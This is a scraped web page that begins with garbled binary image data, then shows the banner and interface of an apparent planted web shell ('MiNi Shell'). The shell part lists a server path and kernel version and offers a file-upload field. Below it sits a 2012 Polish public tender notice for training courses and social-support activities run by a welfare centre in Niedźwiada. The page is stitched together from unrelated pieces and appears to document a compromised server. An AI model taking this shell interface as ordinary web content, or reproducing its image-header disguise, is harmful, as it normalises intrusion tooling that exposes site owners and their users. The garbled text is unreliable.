JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120703/144741-N-2012.html

<p class="kh_header"><b>Niedźwiada: Organizacja szkoleń i kursów w ramach projektu Nowe umiejętności kapitałem na przyszłość - promocja aktywnej integracji społecznej i zawodowej w Gminie Niedźwiada</b><br>
<b>Numer ogłoszenia: 144741 - 2012; data zamieszczenia: 03.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Niedźwiadzie , Niedźwiada Kolonia 42A, 21-104 Niedźwiada, woj. lubelskie, tel. 81 851 22 20, faks 81 851 22 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opsniedzwiada.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja szkoleń i kursów w ramach projektu Nowe umiejętności kapitałem na przyszłość - promocja aktywnej integracji społecznej i zawodowej w Gminie Niedźwiada.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja szkoleń i kursów dla 21 osób korzystających z usług Ośrodka Pomocy Społecznej w Niedźwiadzie. Jest to jedna grupa uczestników, którzy będą korzystali z różnych szkoleń i kursów. Dlatego też terminy kursów zawodowych nie mogą  nakładać się z terminami innych zajęć.

KURS MAGAZYNIERA Z OBSŁUGĄ WÓZKA JEZDNIOWEGO.
Cel: celem szkolenia jest przygotowanie uczestnika kursu do pracy na stanowisku magazyniera oraz kierowcy operatora wózków. 
Szkolenie powinno obejmować zagadnienia:
-	budowa i wyposażenie wózka jezdniowego;
-	czynności operatora przy obsłudze wózka jezdniowego;
-	praktyczna nauka jazdy i manewrowanie wózkiem jezdniowym;
-	wymiana butli przy wózkach jezdniowych;
-	dokumentacja organizacji magazynu;
-	gospodarka magazynowa;
-	wystawianie dokumentów sprzedaży;
-	przyjmowanie towarów do magazynu;
-	sporządzanie zamówień;
-	sposoby rozmieszczania towarów w magazynie;
-	przepisy BHP w jednostce handlowej i podczas pracy z wózkiem jezdniowym.
Liczba uczestników:  4 osoby.
Liczba godzin: 122  w tym zajęcia teoretyczne i zajęcia praktyczne).

KUCHARZ MAŁEJ GASTRONOMI. 
Cel: przygotowanie uczestników szkolenia do prowadzenia małej gastronomii; nabycie umiejętności zakładania działalności gospodarczej. 
Szkolenie powinno obejmować następujące zagadnienia:
-	zasady BHP;
-	podstawy technologii gastronomicznej;
-	zagadnienia ekonomiczno-prawne;
-	obsługa konsumenta;
-	catering i organizacja imprez okolicznościowych;
-	obliczanie wartości energetycznej i odżywczej produktów spożywczych i potraw;
-	dokonywanie oceny produktów i napojów pod względem towaroznawczym;
-	przygotowywanie podstawowego asortymentu potraw i napojów z surowców 
i półproduktów spożywczych w oparciu o normy i receptury gastronomiczne zgodnie z odpowiednimi technikami ich sporządzania;
-	sporządzanie kalkulacji potraw i napojów;
-	poddawanie obróbce wstępnej i cieplnej surowców odpowiednimi narzędziami, maszynami i urządzeniami;
-	konserwowanie maszyn i urządzeń;
-	stosowanie zasad zabezpieczenia jakości zdrowotnej potraw, utrzymywanie w czystości i porządku stanowiska pracy, przestrzeganie przepisów sanitarnych, bhp, ppoż. obowiązujących w zakładach żywienia zbiorowego;
-	zasady zakładania działalności gospodarczej (prawne aspekty organizacji i prowadzenia przedsiębiorstwa, formy organizacyjno-prawne działalności gospodarczej dostępne w UE, ograniczenia i swobody podejmowania działalności gospodarczej, umowy cywilno-prawne, wybrane zagadnienia z prawa pracy);
-	obsługa kas fiskalnych z terminalem płatniczym, fakturowanie.
Liczba uczestników: 8 osób.
Liczba godzin: 190  lekcyjnych (w tym zajęcia praktyczne i teoretyczne).

KONSERWATOR Z OBSŁUGĄ KOTŁÓW CO.
Cel: absolwent kursu powinien posiadać wiadomości, umiejętności  umożliwiające obsługę kotłów wodnych, parowych i olejowych, kotłów gazowych oraz posiadać uprawnienia elektroenergetyczne do 1 kV.
Szkolenie powinno obejmować następujące zagadnienia:
-	obsługa kotłów wodnych, parowych, olejowych i gazowych;
-	urządzenia współpracujące z kotłami;
-	ogólne wiadomości o gospodarce cieplnej;
-	przepisy BHP i ppoż;
-	aparatura kontrolno-pomiarowa;
-	instalacje c.o. i uzdatniania wody;
-	zasady procesu spalania;
-	materiałoznawstwo;
-	zagadnienia z zakresu budowy, działania oraz warunków technicznych eksploatacji urządzeń, instalacji i sieci gazowych;
-	zasady budowy, działania oraz warunki techniczne obsługi urządzeń i instalacji sieci energetycznych;
-	przepisy o gospodarce energetycznej;
-	warunki wykonywania prac kontrolno-pomiarowych;
-	zajęcia praktyczne.
Liczba uczestników:  1 osoba.
Liczba godzin:  90 godzin  (w tym zajęcia teoretyczne i praktyczne).

PRAWO JAZDY KAT. B
Cel: absolwent kursu powinien posiadać wiadomości, umiejętności i zachowania umożliwiające bezpieczne kierowanie pojazdem.
Szkolenie winno zostać przeprowadzone zgodnie z programem określonym rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217, poz. 1834 z późn. zm.).
Liczba uczestników:  5 osoby.
Liczba godzin: 70 os. (w tym: zajęcia teoretyczne 30 godz. lekcyjnych (45 min.); zajęcia praktyczne 40 godz. zegarowe (60 min.).
Miejsce szkolenia: Lubartów (zajęcia teoretyczne); Lublin Lubartów (zajęcia praktyczne).

PRAWO JAZDY KAT. C
Cel: absolwent kursu powinien posiadać wiadomości, umiejętności i zachowania umożliwiające bezpieczne kierowanie pojazdem.	
Liczba uczestników: 1 osoba.
Liczba godzin: 70 os. (w tym: zajęcia teoretyczne 30 godz. lekcyjnych (45 min.); zajęcia praktyczne 40 godz. zegarowe (60 min.).
Miejsce szkolenia: Lubartów (zajęcia teoretyczne); Lublin Lubartów (zajęcia praktyczne).

Inne postanowienia.

1.	Zajęcia mogą odbywać się od poniedziałku do piątku (za wyjątkiem dni ustawowo wolnych od pracy) w godzinach 8.00-18.00, maksymalnie po 8 godzin lekcyjnych (45 min.) dziennie, przedzielone co najmniej  5 minutowymi przerwami. 
2.	Każdy uczestnik zajęć musi mieć indywidualny dostęp do stanowisk komputerowych, sprzętu i urządzeń wykorzystywanych podczas zajęć. 
3.	Wszyscy uczestnicy szkoleń mają otrzymać od Wykonawcy materiały edukacyjne w formie drukowanej lub elektronicznej tj. (płyta CD, długopis, teczka, zeszyt-notes, skrypty dotyczące danego szkolenia zawierające omawiane zagadnienia, oznaczone logo zgodnie z umową. 
4.	Szkolenia muszą rozpocząć się badaniami lekarskimi, jeżeli są wymagane do udziału w szkoleniu, których koszt pokrywa Wykonawca. 
5.	Pomieszczenia, w których odbywać się będą szkolenia powinny być przystosowane pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkoleń, oznaczone logo zgodnie z umową. 
6.	Zamawiającemu ma prawo wprowadzić zmiany w przedstawiony przez Wykonawcę harmonogram zajęć. Jeżeli Zamawiający wprowadzi takie zmiany poinformuje o tym Wykonawcę minimum 7 dni przed rozpoczęciem szkolenia.
7.	Kontrola umiejętności zdobytych podczas szkolenia musi być zrealizowana w formie egzaminu i potwierdzona wydaniem odpowiedniego dokumentu stwierdzającego ukończenie przedmiotowego szkolenia. Przystąpienie każdego z uczestników szkolenia do egzaminu jest obligatoryjne. Jeżeli wymagają tego odrębne przepisy, egzamin i uzyskane na jego podstawie kwalifikacje muszą być potwierdzone w sposób przewidziany tymi przepisami.
8.	Kurs Prawo jazdy kat. B oraz C w cenie oferty należy przewidzieć koszty pierwszego egzaminu teoretycznego i praktycznego.
9.	Wykonawca ubezpieczy uczestników na czas trwania szkoleń.
10.	Wykonawca zagwarantuje dla uczestników szkoleń wyżywienie w postaci obiadu złożonego z dwóch dań (zupa i drugie danie), jeżeli zajęcia będą trwały więcej niż 6 godzin dziennie. Posiłki powinny być każdego dnia inne, podawane w jednorazowych naczyniach z jednorazowymi sztućcami.
11.	Wykonawca zapewni podczas przerw kawowych herbatę, kawę, ciastka, wodę mineralną.
12.	Osoby dojeżdżające autobusem na szkolenie otrzymują zwrot kosztów podróży na podstawie ceny biletu komunikacji publicznej. Zwrot za dojazd na szkolenie odbywa się w formie wypłaty uczestnikowi szkolenia przez Wykonawcę kwoty odpowiadającej równowartości rzeczywistych, poniesionych przez daną osobę kosztów dojazdu i powrotu (uczestnicy zamieszkuje na terenie Gminy Niedźwiada).
13.	Miejsce szkolenia: Lubartów.
14.	Czas przeprowadzenia szkoleń: od 01 sierpnia do 30 listopada 2012 r.

Poradnictwo oraz wsparcie indywidualne i grupowe w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych. 

Cel: nabycie umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek pracy i aktywizację zawodową.
W ramach ww. zajęć uczestnik ma mieć możliwość zdobycia wiedzy na temat: 
-	zasad zarządzania gospodarstwem domowym,
-	radzenia sobie ze stresem w trudnych sytuacjach życiowych,
-	metod właściwej komunikacji interpersonalnej,
-	budowania poczucia własnej wartości,
-	nauki asertywności,
-	technik kreatywnego rozwiązywania sytuacji problemowych,
-	odpowiedzialności za wyniki swoich działań,
-	wizażu - zdobycie wiedzy na temat techniki wykonania makijażu, pozytywnej prezentacji własnej osoby, nauka dobierania odpowiedniego stroju do budowy ciała, aktualne trendy mody. 
Liczba uczestników: 21 osób.
Liczba godzin: 63 godzin lekcyjnych, w tym 21 godzin zajęć grupowych i 42 indywidualnych (po 2 godziny indywidualnej na 1 uczestnika). 

 Zajęcia grupowe i indywidualne w zakresie doradztwa zawodowego. 

Cel: nabycie umiejętności aktywnego poszukiwania pracy, odkrycie własnych możliwości i predyspozycji zawodowych, umiejętność twórczego myślenia, zarządzania czasem, planowania pracy
W ramach ww. zajęć uczestnik będzie miał możliwość zdobycia wiedzy na temat: 
-	budowania obrazu własnej osoby (obraz siebie, analiza postaw życiowych, moje mocne       strony); 
-	dokumentów aplikacyjnych i autoprezentacji (zasady sporządzania dokumentów niezbędnych przy zatrudnieniu, redagowanie dokumentów aplikacyjnych i innych, przydatnych podczas poszukiwania pracy); 
-	rynku usług internetowych jako sposobu na aktywność zawodową (analiza internetowych ofert  pracy); 
-	planowania działań i wyznaczanie celów (samoocena i plan działania, wyznaczanie własnych celów); 
-	zdobycia wiedzy na temat lokalnego rynku pracy; 
-	technik aktywnego poszukiwania pracy; 
-	przygotowania osobistej strategii działania; 
-	instytucji i organizacji, które mogą wspierać indywidualne działania związane 
z rozwiązywaniem problemów zawodowych związanych z poszukiwaniem pracy lub podejmowaniem działalności gospodarczej;
-	sztuki autoprezentacji.
 Liczba uczestników: 21 osób. 
 Liczba godzin: 49 godzin lekcyjnych (w tym 7 godzin zajęć grupowych i 42 godzin indywidualnych po 2 godziny indywidualne na 1 uczestnika). 

Inne postanowienia:
1)	Zajęcia mogą odbywać się od poniedziałku do piątku (za wyjątkiem dni ustawowo wolnych od pracy) w godzinach 8.00-18.00, maksymalnie po 8 godzin lekcyjnych (45 min.) dziennie, przedzielone co najmniej  5 minutowymi przerwami.
2)	Zamawiającemu ma prawo wprowadzić zmiany w przedstawiony przez Wykonawcę harmonogram zajęć. Jeżeli Zamawiający wprowadzi takie zmiany poinformuje o tym Wykonawcę minimum 7 dni przed rozpoczęciem szkolenia
3)	Zapewnienie sali szkoleniowej i materiałów edukacyjnych dla 21 osób (materiały drukowane - opis zagadnień omawianych na zajęciach, ankiety i testy) oznaczone logo zgodnie z umową oraz pokrycie ich kosztów. 
4)	Wykonawca zagwarantuje dla uczestników szkoleń wyżywienie w postaci obiadu złożonego z dwóch dań (zupa i drugie danie), jeżeli zajęcia będą trwały więcej niż 6 godzin dziennie. Posiłki powinny być każdego dnia inne, podawane w jednorazowych naczyniach z jednorazowymi sztućcami.
5)	Wykonawca zapewni podczas przerw kawowych herbatę, kawę, ciastka, wodę mineralną. 
6)	Osoby dojeżdżające autobusem na szkolenie otrzymują zwrot kosztów podróży na podstawie ceny biletu komunikacji publicznej. Zwrot za dojazd na szkolenie odbywa się w formie wypłaty uczestnikowi szkolenia przez Wykonawcę kwoty odpowiadającej równowartości rzeczywistych, poniesionych przez daną osobę kosztów dojazdu i powrotu (uczestnicy zamieszkuje na terenie Gminy Niedźwiada).
7)	Wystawienie zaświadczeń potwierdzających ukończone zajęcia oznaczone logo zgodnie z umową . 
8)	Przeprowadzenie badań ankietowych na początku zajęć oraz na zakończenie udzielonego wsparcia wraz z podsumowaniem efektywności.
9)	Miejsce zajęć: Lubartów. 
10)	Czas przeprowadzenia szkolenia: od 1 sierpnia do 30 listopada 2012r. 

   Zajęcia z zakresu terapii psychospołecznej.

Cel: poprawa funkcjonowania rodziny, wzrost samodzielności i aktywności wszystkich jej członków w aspekcie społecznym, ekonomicznym i kulturowym. 
W ramach ww. zajęć uczestnik będzie miał możliwość zdobycia wiedzy na temat: 
-	pełnienia ról społecznych,
-	możliwości poprawy relacji w rodzinie,
-	spędzania czasu i budowania relacji rodzic - dziecko,
-	umiejętności niezbędnych w procesie wychowywania dzieci.
    
1)	   Liczba uczestników  - 14 (5 osób dorosłych i 9 dzieci w wieku od  5   do 15 lat).
2)	   Łączna liczba zajęć - 16 godzin lekcyjnych (2 dni po 8 godz. dziennie).
3)	   W skład usługi wchodzi :
a.	2 dniowy wyjazd szkoleniowy (w dniach sobota i niedziela) dla 14 osób do ośrodka wypoczynkowego zlokalizowanego nad jeziorem na terenie Pojezierza Łęczyńsko - Włodawskiego,
b.	zapewnienie sali szkoleniowej 
c.	zapewnienie 1 noclegu oraz wyżywienia (2 x obiad - pierwsze i drugie danie 
z deserem), 1 x śniadanie i 1 x kolacja np. grill, ognisko, 
d.	zapewnienie ubezpieczenia NNW uczestników na czas pobytu i przejazdu, 
e.	zapewnienie zabaw aktywizacyjno -integracyjne dla dzieci i rodziców, 
f.	  zapewnienie transportu uczestników z miejsca zamieszkania do miejsca pobytu 
i z powrotem,
g.	zapewnienie opieki dla dzieci podczas zajęć rodziców,
h.	zapewnienie napojów ciepłych (herbata i kawa) i zimnych tj. woda mineralna, soków podczas zajęć.
i.	Wystawienie zaświadczeń potwierdzających ukończenie zajęć. Zaświadczenia powinny zawierać logo projektu.
3)	   Osoby, które będą prowadziły zajęcia muszą posiadać kwalifikacje zawodowe, uprawniające ich do wykonywania tego typu zadania.
4)	   Wystawienie zaświadczeń potwierdzających ukończone zajęcia. 
5)	    Zamawiającemu ma prawo wprowadzić zmiany w przedstawiony przez Wykonawcę harmonogram zajęć. Jeżeli Zamawiający wprowadzi takie zmiany poinformuje o tym Wykonawcę minimum 7 dni przed rozpoczęciem szkolenia
6)	    Czas przeprowadzenia zajęć: od 1 sierpnia do 31 sierpnia 2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać wykonanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 2 (dwóch ) usług  polegających na zorganizowaniu i przeprowadzeniu szkoleń zawodowych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje wykwalifikowaną kadrą, która przeprowadziła co najmniej 3 szkolenia o tematyce zgodnej  przedmiotem zamówienia (min. po 1 osobie do każdego kursu i szkolenia);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
